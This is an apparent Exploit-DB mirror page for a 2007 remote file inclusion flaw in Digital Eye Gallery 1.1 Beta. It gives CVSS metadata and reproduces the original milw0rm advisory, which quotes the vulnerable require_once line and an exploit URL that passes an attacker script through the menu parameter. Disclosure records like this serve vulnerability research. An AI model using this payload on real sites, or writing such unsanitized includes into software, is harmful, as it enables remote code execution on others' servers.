header-logo
Suggest Exploit
vendor:
Digital Eye Gallery
by:
Cold z3ro
5.5
CVSS
MEDIUM
Remote File Inclusion
File Inclusion
CWE
Product Name: Digital Eye Gallery
Affected Version From: 1.1 Beta
Affected Version To: 1.1 Beta
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Digital Eye Gallery 1.1 Beta (module.php menu) Remote File Include Vulnerabilities

The vulnerability allows remote attackers to include arbitrary files via a parameter in the module.php menu parameter.

Mitigation:

Update to a fixed version of the software.
Source

Exploit-DB raw data:

######################################################
#
# Digital Eye Gallery 1.1 Beta (module.php menu) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/7469/digital_eye_cms.1.1BETA.tar.gz
#
######################################################
#
# file :  /module.php
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell Crew
#
######################################################
#
# require_once( $menu . '.php' );
#
######################################################
#
# exploit : http://www.example.com/digitaleye_Path/module.php?menu=Evil-script?
#
######################################################
#
#
#
----#  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
#              |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
#              |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
#              | The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
#              All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-21]